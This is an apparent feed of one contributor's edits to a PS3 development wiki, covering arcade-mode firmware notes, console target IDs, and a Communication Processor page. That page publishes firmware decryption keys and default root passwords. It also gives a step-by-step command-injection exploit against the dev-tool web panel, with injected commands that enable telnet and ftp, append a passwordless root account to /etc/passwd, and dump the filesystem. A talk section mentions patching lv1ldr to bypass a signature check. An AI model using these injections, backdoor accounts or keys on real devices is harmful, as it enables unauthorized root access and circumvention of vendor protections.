http://www.psdevwiki.com/ps3/api.php?action=feedcontributions&user=Mathieulh&feedformat=atom PS3 Developer wiki - User contributions [en] 2024-03-29T07:06:06Z User contributions MediaWiki 1.39.6 http://www.psdevwiki.com/ps3/index.php?title=Talk:Namco_System_357&diff=53563 Talk:Namco System 357 2019-05-25T14:55:23Z <p>Mathieulh: /* Possible eid0 Check in Arcade Firmwares?? */</p> <hr /> <div>== BD Emulator usage in arcade (speculation, discussion, notes) ==<br /> There are several details that points to [[BDemu_Drive_Format | BD emulator]] functions in arcade machines:<br /> <br /> * Arcades doesnt have a BD drive, but the game column in XMB in arcades has an &quot;item&quot; to mount discs, this is not a mistake and they did not foget to remove it, is there on purpose<br /> ** The .xml [[XMB#XMB_Configuration_Files | XMB configuration file]] for game column used by arcades is [[XMB-Game#update_files.2Fdev_flash.2Fvsh.2Fresource.2Fexplore.2Fxmb.2Fcategory_game_tool2.xml | category_game_tool2.xml]] and the items displayed are under the tag '''View id=&quot;root_arcade&quot;''' the item that mounts the disc is '''key=&quot;seg_device&quot;''' by using '''CB_MEDIA_FORMAT_PS3GAME_BD'''<br /> <br /> * The path used by firmware updates, the path used by game updates, and the subfolder names used by them matches with a disc structure... but this &quot;disc image&quot; is stored in HDD<br /> **Firmware updates in '''/dev_hdd0/game/SCEEXE000/ARCDIR/PS3UPDAT.PUP''' and game updates in '''/dev_hdd0/game/SCEEXE000/ARCDIR/INSDIR/DATA000.PKG''', the root of the disc is the folder '''SCEEXE000''' (possibly containing a [[PS3_DISC.SFB]], the folder ARCDIR is &quot;replacing&quot; the standard folder name &quot;PS3_GAME&quot; used in discs. ARCDIR can contain the main [[PARAM.SFO]] and several subfolders with more PARAM.SFO's (LICDIR, USRDIR, INSDIR etc...). All this keeps the standards of documented [[PARAM.SFO#CATEGORY | disc structures]], but there can be some parameters inside the .SFB or any of the .SFO's specific for &quot;arcade game disc images&quot;<br /> ** In difference with disc structures... the PS3UPDAT.PUP file is not inside a '''PS3_UPDATE''' folder, this &quot;breaks&quot; the standards for discs<br /> <br /> * Autoboot of games (when PS3 is turned on) in arcade is simply the same XMB setting in retail ps3's used for &quot;disc autoboot&quot;<br /> **In [[XRegistry.sys]] the entry: '''/setting/system/powerOnDiscBoot''', the only difference is in arcade the disc is an image mounted automatically by BD emulator<br /> <br /> == Boot DECR-1000 in Arcade Mode ==<br /> To boot the DECR-1000 in 'Arcade Mode' set the System parameter to 0x0003000000000000. (0x0001000000000000 is PS3 60GB HDD, 0x0002000000000000 is PS3 20GB HDD)&lt;br&gt;<br /> On startup the console will check for a USB drive.<br /> <br /> == Possible eid0 Check in Arcade Firmwares?? ==<br /> <br /> A friend of mine converted his CECHL00 (VER-001) to arcade and installed 4.40 GEX OFW after converting, his system fully bricked but he was able to fix it by reflashing, the system does not brick if he installs 2.51 or 3.10<br /> <br /> - HalfMileRide<br /> <br /> This occurs because since firmware 4.30 an [[Flash:Encrypted Individual Data - eEID|eid0]] signature check was added in [[Loaders|lv1ldr]], lv1ldr would have to be patched in order for the firmware to run if you manually converted the unit and did not use a donor eid0 (from a real GEX dump for instance).<br /> <br /> - Mathieulh<br /> <br /> Same as for [[Cex2Dex]], see also [[Online Connections|X-I-5-Passphrase]].<br /> <br /> - Roxanne<br /> <br /> Is this eid0 check in lv1ldr present on all firmware types? For example if I converted a genuine DEX to CEX would it brick if I install 4.30+ CEX OFW? <br /> <br /> - HalfMileRide<br /> <br /> Indeed it is, you can either use an untouched decrypted eid0 from a donor console or patch lv1ldr (this is actually done on some cfw such as Rebug) to circumvent this protection <br /> <br /> - Mathieulh</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Talk:Namco_System_357&diff=53555 Talk:Namco System 357 2019-05-24T11:15:08Z <p>Mathieulh: /* Possible eid0 Check in Arcade Firmwares?? */</p> <hr /> <div>== BD Emulator usage in arcade (speculation, discussion, notes) ==<br /> There are several details that points to [[BDemu_Drive_Format | BD emulator]] functions in arcade machines:<br /> <br /> * Arcades doesnt have a BD drive, but the game column in XMB in arcades has an &quot;item&quot; to mount discs, this is not a mistake and they did not foget to remove it, is there on purpose<br /> ** The .xml [[XMB#XMB_Configuration_Files | XMB configuration file]] for game column used by arcades is [[XMB-Game#update_files.2Fdev_flash.2Fvsh.2Fresource.2Fexplore.2Fxmb.2Fcategory_game_tool2.xml | category_game_tool2.xml]] and the items displayed are under the tag '''View id=&quot;root_arcade&quot;''' the item that mounts the disc is '''key=&quot;seg_device&quot;''' by using '''CB_MEDIA_FORMAT_PS3GAME_BD'''<br /> <br /> * The path used by firmware updates, the path used by game updates, and the subfolder names used by them matches with a disc structure... but this &quot;disc image&quot; is stored in HDD<br /> **Firmware updates in '''/dev_hdd0/game/SCEEXE000/ARCDIR/PS3UPDAT.PUP''' and game updates in '''/dev_hdd0/game/SCEEXE000/ARCDIR/INSDIR/DATA000.PKG''', the root of the disc is the folder '''SCEEXE000''' (possibly containing a [[PS3_DISC.SFB]], the folder ARCDIR is &quot;replacing&quot; the standard folder name &quot;PS3_GAME&quot; used in discs. ARCDIR can contain the main [[PARAM.SFO]] and several subfolders with more PARAM.SFO's (LICDIR, USRDIR, INSDIR etc...). All this keeps the standards of documented [[PARAM.SFO#CATEGORY | disc structures]], but there can be some parameters inside the .SFB or any of the .SFO's specific for &quot;arcade game disc images&quot;<br /> ** In difference with disc structures... the PS3UPDAT.PUP file is not inside a '''PS3_UPDATE''' folder, this &quot;breaks&quot; the standards for discs<br /> <br /> * Autoboot of games (when PS3 is turned on) in arcade is simply the same XMB setting in retail ps3's used for &quot;disc autoboot&quot;<br /> **In [[XRegistry.sys]] the entry: '''/setting/system/powerOnDiscBoot''', the only difference is in arcade the disc is an image mounted automatically by BD emulator<br /> <br /> == Boot DECR-1000 in Arcade Mode ==<br /> To boot the DECR-1000 in 'Arcade Mode' set the System parameter to 0x0003000000000000. (0x0001000000000000 is PS3 60GB HDD, 0x0002000000000000 is PS3 20GB HDD)&lt;br&gt;<br /> On startup the console will check for a USB drive.<br /> <br /> == Possible eid0 Check in Arcade Firmwares?? ==<br /> <br /> A friend of mine converted his CECHL00 (VER-001) to arcade and installed 4.40 GEX OFW after converting, his system fully bricked but he was able to fix it by reflashing, the system does not brick if he installs 2.51 or 3.10<br /> <br /> - HalfMileRide<br /> <br /> This occurs because since firmware 4.30 an eid0 signature check was added in lv1ldr, lv1ldr would have to be patched in order for the firmware to run if you manually converted the unit and did not use a donor eid0 (from a real GEX dump for instance).<br /> <br /> - Mathieulh</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Product_Code&diff=53549 Product Code 2019-05-23T14:36:37Z <p>Mathieulh: /* Known Target ID's */</p> <hr /> <div>A Target ID is a single byte or hexadecimal identifier that determines what type of console you have.<br /> <br /> ==Known Target ID's==<br /> The 6th byte in [[IDPS]] represents your [[Target ID]]. It can be found in EID0 and EID5, see [[Flash]], [[More System Information]], and [[SKU Regioning]]<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Value !! Console Type !! Shortcode !! Region Code/ID<br /> |-<br /> | {{TID80}} || N/A || N/A<br /> |-<br /> | {{TID81}} || TOOL || TOOL<br /> |-<br /> | {{TID82}} || DEX / QABDP|| DEX / QABDP<br /> |-<br /> | {{TID83}} || CEX || J1<br /> |-<br /> | {{TID84}} || CEX || UC2<br /> |-<br /> | {{TID85}} || CEX || CEL<br /> |-<br /> | {{TID86}} || CEX || KR2<br /> |-<br /> | {{TID87}} || CEX || CEK<br /> |-<br /> | {{TID88}} || CEX || MX2<br /> |-<br /> | {{TID89}} || CEX || AU3<br /> |-<br /> | {{TID8A}} || CEX || E12<br /> |-<br /> | {{TID8B}} || CEX || TW1<br /> |-<br /> | {{TID8C}} || CEX || RU3<br /> |-<br /> | {{TID8D}} || CEX || CN9<br /> |-<br /> | {{TID8E}} || CEX || HK5<br /> |-<br /> | {{TID8F}} || CEX || BR2<br /> |-<br /> | {{TIDA0}} || ARC || ARCADE<br /> |}<br /> *A list with the region Code/ID's can be seen on /dev_flash/vsh/module/'''[[sysconf_plugin|sysconf_plugin.sprx]]''' and seems to be &lt;abbr title=&quot;InternetBrowser_ContentGuideline-English_3.70.pdf&quot;&gt;simular to PSP&lt;/abbr&gt;<br /> *Not in this table: {{PROTO}} Prototype (mostly {{TOOL}} or {{SD}} themselves)<br /> *No target or EID/idps on CEB units.<br /> <br /> {{Flash}}<br /> {{Development}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Template:TID80&diff=53548 Template:TID80 2019-05-23T14:35:05Z <p>Mathieulh: </p> <hr /> <div>&lt;span title=&quot;Target ID = 0x80&quot;&gt;0x80 ||{{NOT_IN_USE}} &lt;/span&gt;&lt;noinclude&gt;[[Category:Templates]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Template:NOT_IN_USE&diff=53547 Template:NOT IN USE 2019-05-23T14:34:18Z <p>Mathieulh: Created page with &quot;&lt;span style=&quot;background:#ff0000; color:black;&quot;&gt;&lt;small&gt;&lt;abbr title=&quot;NOT IN USE&quot;&gt;&amp;nbsp;NOT IN USE&amp;nbsp;&lt;/abbr&gt;&lt;/small&gt;&lt;/span&gt;&lt;noinclude&gt;Category:Templates&lt;/noi...&quot;</p> <hr /> <div>&lt;span style=&quot;background:#ff0000; color:black;&quot;&gt;&lt;small&gt;&lt;abbr title=&quot;NOT IN USE&quot;&gt;[[Target ID|&amp;nbsp;NOT IN USE&amp;nbsp;]]&lt;/abbr&gt;&lt;/small&gt;&lt;/span&gt;&lt;noinclude&gt;[[Category:Templates]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Template:TID82&diff=53546 Template:TID82 2019-05-23T14:31:07Z <p>Mathieulh: AV Tool uses target 0x82</p> <hr /> <div>&lt;span title=&quot;Target ID = 0x82&quot;&gt;0x82 || {{DEX}} {{TEST}} Debug / AV Tool / DECH / DECHS&lt;/span&gt;&lt;noinclude&gt;[[Category:Templates]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Template:TID80&diff=53545 Template:TID80 2019-05-23T14:30:15Z <p>Mathieulh: DECHSA00A use target id 0x82, 0x80 is NOT USED.</p> <hr /> <div>&lt;span title=&quot;Target ID = 0x80&quot;&gt;0x80 || NOT USED &lt;/span&gt;&lt;noinclude&gt;[[Category:Templates]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Communication_Processor&diff=48457 Communication Processor 2018-03-20T21:05:44Z <p>Mathieulh: /* Fun scripts to try */ Added details</p> <hr /> <div>{{Wikify}}<br /> <br /> == Hardware ==<br /> [[CXD9790GG]] (I/O)<br /> <br /> [[TCP-510]] (Board ID on the DEH models such as [[DEH-R1000]])<br /> <br /> [[TCP-520]] (Board ID on the [[DECR-1000]])<br /> <br /> ([[TCP-510]] matches the TMU-510 motherbord, while [[TCP-520]] matches the TMU-520 motherboard)<br /> The PSP DTP-T1000 unit also sports a communication processor but it does not come as a separate board, the hardware is integrated/soldered directly to the motherboard, unlike the PS3 CP, it does not run the firmware from RAM (the PS3 CP copies the firmware from ROM to RAM at boot so changes are, by default not persistant) and therefore writes files directly to flash.<br /> <br /> CEB units feature a PCI slot capable of harboring a CP daughterboard (Sony used such setups as System Debuggers before DEH units came along), CP boards switched to a proprietary interface and shipped to 3rd parties starting with DEH-Rx<br /> <br /> == Software ==<br /> <br /> === De/Encrypt Communication Processor updates ===<br /> This is how to decrypt/encrypt Playstation 3 Reference Tool Communication Processor updates. (use this knowledge wisely)<br /> <br /> This was achieved by exploiting the communication processor firmware and gaining root privileges on the running Montavista Linux.<br /> The key for the CP update packages is located within the toolupdatedec binary located at /usr/local/sony/bin/toolupdatedec<br /> <br /> The update packages are just tar.gz packages encrypted using AES256CBC Here is the syntax to decrypt them :<br /> <br /> * The first 16 bytes of the package is the IV, the Second 16 bytes is the MD5 hash of the decrypted package.<br /> <br /> So use this Syntax after skipping the first 32 bytes of the file: <br /> <br /> {{keyboard|content=openssl aes-256-cbc -in reftool_cp_xxx.bin -K E8ED2B817207B70C5DF9090507AF2A8982967620D692B92A59231638402DF13F -iv the_first_16_bytes_of_the_file -d &gt; dec.tgz<br /> }}<br /> <br /> PSP Hardware Tool Updates use the very same encryption but a different key inside the toolupdatedec binary.<br /> <br /> The key to these units has also been dumped, here is the syntax to decrypt psp Hardware Tool Update for DTP-T1000<br /> <br /> {{keyboard|content=openssl aes-256-cbc -in psptoolupdate.bin -K A400C48628A7A5294D11AE3BB2587AEA32E501C63E49D1DCAA19B5AEB092F3DB -iv the_first_16_bytes_of_the_file -d &gt; dec.tgz<br /> }}<br /> <br /> P.S. If you have any trouble extracting the tarballs, try using Linux.<br /> <br /> - Mathieulh<br /> <br /> Because a picture is worth a thousand words, here is one: <br /> &lt;gallery&gt;<br /> File:CP_ROOT.jpg|Root on the Communication Processor<br /> &lt;/gallery&gt;<br /> <br /> === Proper De/Encrypting of CP Updates ===<br /> *source code [http://gitorious.ps3dev.net/cp-update-crypt cp-update-crypt] [[Gitorious]]<br /> <br /> == Exploiting the Communication Processor ==<br /> <br /> After initially deciding not to release the cgi exploit in case Sony may release yet another hardware based on the [[CXD9790GG]] MIPS processor, no such hardware (to my knowledge) ever came out; thus I am now documenting this exploit:<br /> <br /> &lt;div style=&quot;border: 5px solid red; padding: 5px;&quot;&gt;<br /> '''Editor's note:''' The following &lt;html&gt; code has been edited for a better experience through displaying on this wiki page. The following has ben replaced... ([[User:Roxanne|Roxanne]] ([[User talk:Roxanne|talk]]) - 03&lt;sup&gt;rd&lt;/sup&gt; March 2016 - 21:50 GMT+1)<br /> * &lt;nowiki&gt;&lt;source lang=&quot;xml&quot;&gt; instead of &lt;pre&gt;&lt;/nowiki&gt;<br /> * &lt;nowiki&gt;&lt;title&gt;Save and load&lt;/title&gt; instead of &lt;title&gt;Save &amp; load&lt;/title&gt;&lt;/nowiki&gt;<br /> * &lt;nowiki&gt;&lt;div class=&quot;title&quot;&gt;Save and load&lt;/div&gt; instead of &lt;div class=&quot;title&quot;&gt;Save &amp; load&lt;/div&gt;&lt;/nowiki&gt;<br /> <br /> View here to look for the original code... (by [[User:Mathieulh|Mathieulh]])<br /> * http://www.psdevwiki.com/ps3/index.php?title=Communication_Processor&amp;oldid=41067#Exploting_the_Communication_Processor<br /> * http://www.psdevwiki.com/ps3/index.php?title=Communication_Processor&amp;oldid=41073#Exploting_the_Communication_Processor<br /> &lt;/div&gt;<br /> <br /> === Step 1 - The Development Tool Web panel ===<br /> <br /> The first thing you want to do, assuming you already have your Development Tool properly setup, is to go to this page http://devtool/cgi-bin/admin/save_setting.cgi?lang=english (you will want to replace &quot;devtool&quot; by the ip/hostname of your Development Tool), you may also reach this page by simply<br /> going to the &quot;Save &amp; load&quot; page of your tool's panel.<br /> <br /> This page is actually the front end for a cgi script that can be used to save and/or load your development tool's configuration settings into/from a file. <br /> Once on the page, it is fairly easy to do a right click on your favorite web browser and save it as source, assuming you did not mistakenly save the top.cgi page instead, this is the result you should get: <br /> <br /> &lt;source lang=&quot;xml&quot;&gt;<br /> &lt;html&gt;<br /> &lt;head&gt;<br /> &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=iso-8859-1&quot;&gt;<br /> &lt;title&gt;Save and load&lt;/title&gt;<br /> &lt;link rel=&quot;stylesheet&quot; href=&quot;/style.css&quot;&gt;<br /> &lt;/head&gt;<br /> &lt;body&gt;<br /> &lt;div class=&quot;title&quot;&gt;Save and load&lt;/div&gt;<br /> &lt;div class=&quot;abstract&quot;&gt;Download of the current settings or upload of setting with a file.&lt;/div&gt;&lt;br&gt;&lt;hr&gt;<br /> &lt;div class=&quot;contents&quot;&gt;<br /> &lt;form action=&quot;save_setting.cgi?lang=english&quot; method=&quot;post&quot;<br /> enctype=&quot;multipart/form-data&quot;&gt;<br /> Save setting file<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;<br /> Setting file<br /> &lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;a href=&quot;/var/ps3tool.conf&quot;&gt;<br /> ps3tool.conf<br /> &lt;/a&gt;<br /> &lt;br&gt;<br /> (Right-click and then select a menu like [Save Target As] on your browser.)<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;hr&gt;<br /> Upload setting file<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;<br /> Setting file<br /> &lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;input type=&quot;file&quot; name=&quot;setting&quot;&gt;<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;div align=&quot;center&quot;&gt;<br /> &lt;input type=&quot;submit&quot; name=&quot;confirm&quot; value=&quot;Setting&quot;&gt;<br /> &lt;/div&gt;<br /> &lt;/form&gt;<br /> &lt;/div&gt;<br /> &lt;hr&gt;<br /> &lt;a href=&quot;/cgi-bin/contents.cgi?lang=english&quot;&gt;<br /> Top<br /> &lt;/a&gt;<br /> &lt;!--<br /> &amp;nbsp;<br /> &lt;a href=&quot;/help/english/save_setting.html&quot; target=&quot;_blank&quot;&gt;<br /> Help<br /> &lt;/a&gt;<br /> --&gt;<br /> &lt;/body&gt;<br /> &lt;/html&gt;<br /> &lt;/source&gt;<br /> <br /> <br /> Besides the obvious security hazard in the fact that the httpd service runs as root, the exploit itself still remains hidden unless you get the whole save_setting.cgi file and look into the save_setting_file and the rename_settingfile functions (I'll let you dig into these deeper in your own time)<br /> <br /> === Step 2 - Doing simple modifications ===<br /> <br /> Assuming you have saved the right source to your computer, you then need, for this exploit to work, to perform small modifications to those <br /> <br /> What you really want to modify is this part: <br /> &lt;pre&gt;<br /> &lt;input type=&quot;file&quot; name=&quot;setting&quot;&gt;<br /> &lt;/pre&gt;<br /> <br /> Into this part: <br /> &lt;pre&gt;<br /> &lt;input type=&quot;text&quot; name=&quot;setting&quot;&gt;<br /> &lt;/pre&gt;<br /> <br /> As you can see, the change is subtle, but it allows you input actual text instead of sending a file<br /> <br /> Of course since you are not going to use this modified page from the actual Communication Processor's web panel, you need to perform a few more obvious changes to the page (you need to put the hard path to hyperlinks to the .cgi and .conf files)<br /> So, change all the hyperlinks to their full path, for example '''action=&quot;save_setting.cgi?lang=english&quot;''' becomes '''action=&lt;nowiki&gt;&quot;http://DEVTOOL.IP.HERE/cgi-bin/admin/save_setting.cgi?lang=english&quot;&lt;/nowiki&gt;'''<br /> <br /> To the lazy ones, this is what the result should look like (change the hyperlinks accordingly)<br /> <br /> &lt;source lang=&quot;xml&quot;&gt;<br /> &lt;html&gt;<br /> &lt;head&gt;<br /> &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=iso-8859-1&quot;&gt;<br /> &lt;title&gt;Save and load&lt;/title&gt;<br /> &lt;link rel=&quot;stylesheet&quot; href=&quot;/style.css&quot;&gt;<br /> &lt;/head&gt;<br /> &lt;body&gt;<br /> &lt;div class=&quot;title&quot;&gt;Save and load&lt;/div&gt;<br /> &lt;div class=&quot;abstract&quot;&gt;Download of the current settings or upload of setting with a file.&lt;/div&gt;&lt;br&gt;&lt;hr&gt;<br /> &lt;div class=&quot;contents&quot;&gt;<br /> &lt;form action=&quot;http://DEVTOOL.IP.HERE/cgi-bin/admin/save_setting.cgi?lang=english&quot; method=&quot;post&quot;<br /> enctype=&quot;multipart/form-data&quot;&gt;<br /> Save setting file<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;<br /> Setting file<br /> &lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;a href=&quot;http://DEVTOOL.IP.HERE/var/ps3tool.conf&quot;&gt;<br /> ps3tool.conf<br /> &lt;/a&gt;<br /> &lt;br&gt;<br /> (Right-click and then select a menu like [Save Target As] on your browser.)<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;hr&gt;<br /> Upload setting file<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;<br /> Setting file<br /> &lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;input type=&quot;text&quot; name=&quot;setting&quot;&gt;<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;div align=&quot;center&quot;&gt;<br /> &lt;input type=&quot;submit&quot; name=&quot;confirm&quot; value=&quot;Setting&quot;&gt;<br /> &lt;/div&gt;<br /> &lt;/form&gt;<br /> &lt;/div&gt;<br /> &lt;hr&gt;<br /> &lt;a href=&quot;http://DEVTOOL.IP.HERE/cgi-bin/contents.cgi?lang=english&quot;&gt;<br /> Top<br /> &lt;/a&gt;<br /> &lt;!--<br /> &amp;nbsp;<br /> &lt;a href=&quot;/help/english/save_setting.html&quot; target=&quot;_blank&quot;&gt;<br /> Help<br /> &lt;/a&gt;<br /> --&gt;<br /> &lt;/body&gt;<br /> &lt;/html&gt;<br /> &lt;/source&gt;<br /> <br /> &lt;!-- waiting for approval... if not good/working just delete it<br /> {{Boxcode|content=&lt;syntaxhighlight lang=&quot;html5&quot;&gt;<br /> &lt;html&gt;<br /> &lt;head&gt;<br /> &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=iso-8859-1&quot;&gt;<br /> &lt;title&gt;Save &amp;amp; load&lt;/title&gt;<br /> &lt;link rel=&quot;stylesheet&quot; href=&quot;/style.css&quot;&gt;<br /> &lt;/head&gt;<br /> &lt;body&gt;<br /> &lt;div class=&quot;title&quot;&gt;Save &amp;amp; load&lt;/div&gt;<br /> &lt;div class=&quot;abstract&quot;&gt;Download of the current settings or upload of setting with a file.&lt;/div&gt;<br /> &lt;br&gt;<br /> &lt;hr&gt;<br /> &lt;div class=&quot;contents&quot;&gt;<br /> &lt;form action=&quot;http://192.168.0.3/cgi-bin/admin/save_setting.cgi?lang=english&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&gt;<br /> Save setting file<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;Setting file&lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;a href=&quot;http://192.168.0.3/var/ps3tool.conf&quot;&gt;ps3tool.conf&lt;/a&gt;<br /> &lt;br&gt;<br /> (Right-click and then select a menu like [Save Target As] on your browser.)<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;hr&gt;<br /> Upload setting file<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;Setting file&lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;input type=&quot;file&quot; name=&quot;setting&quot;&gt;<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;hr&gt;<br /> Send text command<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;th&gt;Text command&lt;/th&gt;<br /> &lt;td&gt;<br /> &lt;input type=&quot;text&quot; name=&quot;setting&quot;&gt;<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;div align=&quot;center&quot;&gt;<br /> &lt;input type=&quot;submit&quot; name=&quot;confirm&quot; value=&quot;Setting&quot;&gt;<br /> &lt;/div&gt;<br /> &lt;/form&gt;<br /> &lt;/div&gt;<br /> &lt;hr&gt;<br /> &lt;a href=&quot;http://192.168.0.3/cgi-bin/contents.cgi?lang=english&quot;&gt;Top&lt;/a&gt;<br /> &lt;/body&gt;<br /> &lt;/html&gt;<br /> &lt;/syntaxhighlight&gt;}}<br /> --&gt;<br /> <br /> === Step 3 - Profit ! ===<br /> <br /> You should now have a place in which you can input text in the page itself, the exploit works as follows, any command you sent (by pressing on the &quot;Setting&quot; button) preceded by &quot;; &quot; (do not include the quotes) will run as root on the Communication Processor, so here are the obvious commands you need to input in order to gain telnet and ftp access as well as to add a root account to the unit:<br /> <br /> Add a line to start telnet in inetd.conf (on DECR-1000 the line already exists in the original file but is commented; on DTP-T1000 telnet is enabled by default so this command is not required.)<br /> {{keyboard|content=; echo &gt;&gt;/etc/inetd.conf telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd }} <br /> Add a line to start ftpd in inetd.conf<br /> {{keyboard|content=; echo &gt;&gt;/etc/inetd.conf ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd }}<br /> Restart inetd to apply the above changes<br /> {{keyboard|content=; /etc/init.d/inetd restart }}<br /> Add an account called rt with root privileges and no password to the passwd file (alternatively on the DECR-1000 Communication Processor you may ignore this step and log in with the root account and the password cytology on the DTP-T1000 the password to the root account is tAchyOn )<br /> {{keyboard|content=; echo &gt;&gt;/etc/passwd rt::0:0:root:/root:/bin/bash }}<br /> <br /> You may also output files given the right path (if you don't want to mess with ftp) the below example creates a ls.txt file containing a listing of all files on the CP at the Development panel's root<br /> {{keyboard|content=; ls -alR /* &gt; /usr/local/sony/www/html/ls.txt }}<br /> <br /> While sending all these commands (by clicking on the &quot;Setting&quot; button), the Development Tool's panel will send you an error message, this is normal (given the nature of the exploit) and can be ignored, just follow with the next commands until you have achieved your expected goal.<br /> <br /> Once you have dumped the development tool panel's files, or extracted those from updates, the exploit should be fairly obvious to you. Of course when this exploit was first discovered, we had no previous access to the files on the Communication Processor and had to initially take another route, which was to dump the Communication Processor's bootrom using hardware (the chip sits on a socket), discover and use the diagnostic panel/shell on it, find a way out of its sandbox and send (through very slow serial outputs) the content of the Communication Processor's memory (as it was running live), which incidentally contained a whole copy of the file system and allowed to look for an easier way in, eventually the toolupdatedec files from both the DTP-T1000 and TCP-520 (DECR-1000 CP) was dumped using this exploit, allowing to retrieve the keys and algorithms used to decrypt Communication Processor/Hardware Tool updates.<br /> <br /> === Fun scripts to try (DECR-1000 and DEH-R units only) ===<br /> <br /> ==== backup_mode.sh ====<br /> <br /> &lt;pre&gt;<br /> #!/bin/bash<br /> echo -n 0 &gt; /proc/ps3tool_gpio/SC_PI0_DIPSW<br /> echo -n 0 &gt; /proc/ps3tool_gpio/SC_RSTX<br /> sleep 1<br /> echo -n 1 &gt; /proc/ps3tool_gpio/SC_RSTX<br /> &lt;/pre&gt;<br /> <br /> * sets DECR in backup mode<br /> * scver in backup mode is v0.4.5_b4!<br /> <br /> ==== normal_mode.sh ====<br /> <br /> &lt;pre&gt;<br /> #!/bin/bash<br /> echo -n 1 &gt; /proc/ps3tool_gpio/SC_PI0_DIPSW<br /> echo -n 0 &gt; /proc/ps3tool_gpio/SC_RSTX<br /> sleep 1<br /> echo -n 1 &gt; /proc/ps3tool_gpio/SC_RSTX<br /> &lt;/pre&gt;<br /> <br /> * sets DECR in normal mode<br /> <br /> ==== sc_soft_reset.sh ====<br /> <br /> &lt;pre&gt;<br /> #!/bin/bash<br /> echo -n 0 &gt; /proc/ps3tool_gpio/SC_RSTX<br /> sleep 1<br /> echo -n 1 &gt; /proc/ps3tool_gpio/SC_RSTX<br /> &lt;/pre&gt;<br /> <br /> * soft resets SYSCON<br /> <br /> ==== update.sh ====<br /> <br /> &lt;pre&gt;<br /> #!/bin/bash<br /> <br /> function mode() { # 0 = backup mode, 1 = normal mode<br /> printf &quot;$1&quot; &gt; /proc/ps3tool_gpio/SC_PI0_DIPSW<br /> # reset sc<br /> printf &quot;0&quot; &gt; /proc/ps3tool_gpio/SC_RSTX<br /> sleep 1<br /> printf &quot;1&quot; &gt; /proc/ps3tool_gpio/SC_RSTX<br /> # wait for sc to be ready<br /> sleep 2<br /> }<br /> <br /> function command() {<br /> printf &quot;${1}\r\n&quot; &gt; /dev/ttyS0 <br /> }<br /> <br /> # do NOT use this while sx is running, instead use e.g. socat<br /> function print_uart() {<br /> while IFS= read -r -d $'\0' -n 1 LINE; do<br /> printf &quot;%c&quot; &quot;$LINE&quot;<br /> done &lt; /dev/ttyS0<br /> unset IFS<br /> }<br /> <br /> if ! [[ &quot;$1&quot; == /* ]]; then<br /> echo &quot;ERROR: Firmware update file path has to be absolute!&quot;<br /> exit 1 <br /> fi<br /> <br /> if [ ! -f $1 ]; then<br /> echo &quot;ERROR: Firmware update file not found!&quot;<br /> exit 1<br /> fi<br /> <br /> <br /> wait /usr/local/sony/bin/be_shutdown &amp;&gt;/dev/null<br /> <br /> killall scuartd &amp;&gt;/dev/null<br /> command &quot;halt&quot;<br /> sleep 2<br /> <br /> mode 0<br /> <br /> command &quot;firmud&quot;<br /> sleep 2<br /> /usr/bin/sx $1 &lt; /dev/ttyS0 &gt; /dev/ttyS0 &amp;<br /> wait $!<br /> <br /> printf &quot;\n----- Press any key after \'completed!! [mullion]\$\' -----\n&quot;<br /> print_uart &amp;<br /> pid=$!<br /> read -n 1 -s # wait for key<br /> printf &quot;\n&quot;<br /> kill $pid<br /> <br /> mode 1<br /> <br /> /usr/local/sony/bin/scuartd &amp; &amp;&gt;/dev/null<br /> &lt;/pre&gt;<br /> <br /> * Updates SYSCON firmware. Can works sometimes with corrupt firmware. Needs one parameter (absolute path to syscon firmware)<br /> <br /> {{Console Components}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Communication_Processor&diff=48456 Communication Processor 2018-03-20T21:04:18Z <p>Mathieulh: /* Step 3 - Profit ! */ added details</p> <hr /> <div>{{Wikify}}<br /> <br /> == Hardware ==<br /> [[CXD9790GG]] (I/O)<br /> <br /> [[TCP-510]] (Board ID on the DEH models such as [[DEH-R1000]])<br /> <br /> [[TCP-520]] (Board ID on the [[DECR-1000]])<br /> <br /> ([[TCP-510]] matches the TMU-510 motherbord, while [[TCP-520]] matches the TMU-520 motherboard)<br /> 